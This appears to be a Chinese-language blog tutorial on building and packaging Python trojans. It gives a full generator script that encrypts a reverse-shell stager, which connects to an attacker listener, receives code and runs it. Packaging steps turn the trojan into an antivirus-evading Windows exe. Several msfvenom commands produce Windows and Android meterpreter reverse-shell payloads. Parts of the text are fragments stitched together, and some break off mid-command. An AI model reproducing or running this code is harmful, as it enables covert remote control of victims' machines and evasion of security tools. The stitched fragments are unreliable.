如果看过这篇文章,就会发现,这里面s2,s3对应的代码,正是我在文件加密器里使用的密码算法。
我的思路就是将代码块,通过我先前的密码算法加密后,在木马中解密,最后执行。
运行该Python程序,MSF是可以收到回显的
因此,我还写了一个木马生成器
Generater.py
import re
import random
import os
class Cipher:
key = ""
def __init__(self, key):
self.key = key
def setKey(self, key):
self.key = key
def getKey(self):
return self.key
def parseKey(self, key):
if key != "":
o = 0
for k in key:
n = 0
i = str(ord(k))
for t in i:
n += int(t)
o += n
while True:
if o < 10:
o = int(o * 2)
elif o > 100:
o = int(o / 2)
else:
return o
return
def getOdd(self, max):
return [i for i in range(1, max + 1) if i % 2 == 1]
def encrypt(self, data):
if data == "":
return
result = ""
length = len(data)
a = [ord(x) for x in data]
remainder = length % 4
if remainder != 0:
b = 4 - remainder
for c in range(b):
a.append(0)
groups = []
d = len(a) // 2
e1 = a[:d]
e2 = a[d:]
indexs = self.getOdd(d)
groups.append([e1[i - 1] for i in indexs])
groups.append([e1[i] for i in indexs])
groups.append([e2[i - 1] for i in indexs])
groups.append([e2[i] for i in indexs])
f1 = groups[0] + groups[3]
f2 = groups[1] + groups[2]
keycode1 = self.parseKey(self.getKey())
g = []
for h in f1:
i = h + keycode1
j = chr(i)
g.append(i)
result += j
k = str(sum(g))
keycode2 = self.parseKey(k)
for l in f2:
m = l + keycode2
n = chr(m)
result += n
return result
def gene_code(ip,port):
s="""import socket,zlib,base64,struct,time
for x in range(10):
s = socket.socket(2, socket.SOCK_STREAM)
s.connect(('%s', %d))
break
except:
time.sleep(5)
l = struct.unpack('>I', s.recv(4))[0]
d = s.recv(l)
while len(d) < l:
d += s.recv(l - len(d))
exec(zlib.decompress(base64.b64decode(d)), {'s': s})"""
return s%(ip,port)
def gene_key(len=10,f=33,t=125):
res=""
for i in range(len):
res+=chr(random.randint(f,t))
return res
def gene_shell(s,k):
res=r"""# coding=UTF8
import base64,re
s1=r'''%s'''
s2=r"ZGVmIHBhcnNlS2V5KGtleSk6CiAgICBpZiBrZXkgIT0gIiI6CiAgICAgICAgbyA9IDAKICAgICAgICBmb3IgayBpbiBrZXk6CiAgICAgICAgICAgIG4gPSAwCiAgICAgICAgICAgIGkgPSBzdHIob3JkKGspKQogICAgICAgICAgICBmb3IgdCBpbiBpOgogICAgICAgICAgICAgICAgbiArPSBpbnQodCkKICAgICAgICAgICAgbyArPSBuCiAgICAgICAgd2hpbGUgVHJ1ZToKICAgICAgICAgICAgaWYgbyA8IDEwOgogICAgICAgICAgICAgICAgbyA9IGludChvICogMikKICAgICAgICAgICAgZWxpZiBvID4gMTAwOgogICAgICAgICAgICAgICAgbyA9IGludChvIC8gMikKICAgICAgICAgICAgZWxzZToKICAgICAgICAgICAgICAgIHJldHVybiBvCiAgICByZXR1cm4="
s3=r"ZGVmIGRlY3J5cHQoZGF0YSxrZXkpOgogICAgaWYgZGF0YSA9PSAiIjoKICAgICAgICByZXR1cm4KICAgIHJlc3VsdCA9ICIiCiAgICBrZXljb2RlMSA9IHBhcnNlS2V5KGtleSkKICAgIGEgPSBsZW4oZGF0YSkgLy8gMgogICAgYjEgPSBkYXRhWzphXQogICAgYjIgPSBkYXRhW2E6XQogICAgYyA9IFtvcmQoZCkgZm9yIGQgaW4gYjFdCiAgICBlID0gW2YgLSBrZXljb2RlMSBmb3IgZiBpbiBjXQogICAgZyA9IHN0cihzdW0oYykpCiAgICBrZXljb2RlMiA9IHBhcnNlS2V5KGcpCiAgICBoID0gW29yZChpKSBmb3IgaSBpbiBiMl0KICAgIGogPSBbayAtIGtleWNvZGUyIGZvciBrIGluIGhdCiAgICBrID0gbGVuKGUpIC8vIDIKICAgIGdyb3VwMSA9IGVbOmtdCiAgICBncm91cDQgPSBlW2s6XQogICAgZ3JvdXAyID0gals6a10KICAgIGdyb3VwMyA9IGpbazpdCiAgICBkYXRhbGVuZ3RoID0gbGVuKGdyb3VwMSkgKyBsZW4oZ3JvdXAyKSArIGxlbihncm91cDMpICsgbGVuKGdyb3VwNCkKICAgIGwgPSBkYXRhbGVuZ3RoIC8vIDQKICAgIG0gPSBbXQogICAgZm9yIG4gaW4gcmFuZ2UobCk6CiAgICAgICAgbS5hcHBlbmQoZ3JvdXAxW25dKQogICAgICAgIG0uYXBwZW5kKGdyb3VwMltuXSkKICAgIG8gPSBbXQogICAgZm9yIHAgaW4gcmFuZ2UobCk6CiAgICAgICAgby5hcHBlbmQoZ3JvdXAzW3BdKQogICAgICAgIG8uYXBwZW5kKGdyb3VwNFtwXSkKICAgIHEgPSBtICsgbwogICAgZm9yIHIgaW4gcToKICAgICAgICBpZiBub3Qgcj09MDoKICAgICAgICAgICAgcmVzdWx0ICs9IGNocihyKQogICAgcmV0dXJuIHJlc3VsdAo="
key = r'''%s'''
exec(base64.b64decode(s2))
exec(base64.b64decode(s3))
exec(decrypt(s1,key))
res=res%(s,k)
name=gene_key(12,65,90)
path=os.getcwd()+'/'+name+".py"
with open(path,'w',encoding='utf-8') as f:
f.write(res)
print("生成成功,生成位置为:\n"+path)
if __name__ == '__main__':
ip=input("请输入监听IP >>>")
port=input("请输入监听端口 >>>")
if not re.match(re.compile(r'^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.((1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.){2}(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$'),ip)!=None:
print('IP不正确')
exit()
try:
port=int(port)
except:
print("PORT不正确")
exit()
if not 0<port<65536:
print("PORT不正确")
exit()
code=gene_code(ip,port)
key=gene_key()
c=Cipher(key)
s1=c.encrypt(code)
gene_shell(s1,key)
在支持py的目标上,可以直接使用该程序。
但事实是,大部分Windows服务器是没有Python环境的
因此,要将该木马程序打包为exe
我本来是想用pyinstaller的,但不知道为什么pyinstaller生成的马运行不了,因此我用py2exe来打包exe
py2exe可以直接用pip下载
pip install py2exe
接下来在跟木马文件同目录下,创建一个python文件,名称任意
例如,我的木马文件名为shell.py,新建的文件名为1.py
在1.py中输入如下代码
from distutils.core import setup
import py2exe
setup(
name = "shell",
description = "Python-based App",
version = "1.0",
windows = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
在shell.py位置填木马的文件名
用控制台运行该程序
python .\1.py py2exe
在dist目录中有exe文件
火绒扫描不报毒
可以反弹shell
注意,在msfconsoel中,payload要设为python/meterpreter/reverse_tcp
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe &amp;amp;amp;gt; shell.exe
lhost 本地ip
lport 本地端口
命令完成后,会在当前目录下生成一个...
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c
利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。
win7靶机 ip :192.168.56.130
kali攻击机 ip: 192.168.56.135
##实战开始
1.打开kali机,在命令行输入:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192...
msfvenom -p android/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<your port> R > <output file name>.apk
2. 将`<your IP address>`替换为你的IP地址,将`<your port>`替换为用于与受害者通信的端口号,将`<output file name>`替换为生成的apk文件名。
3. 运行命令后,msfvenom会生成一个APK文件,其中包含与你指定的IP地址和端口号进行通信的Meterpreter反向Shell。
请注意,生成的捆绑安卓木马仅供授权渗透测试使用,未经授权的使用是非法的。
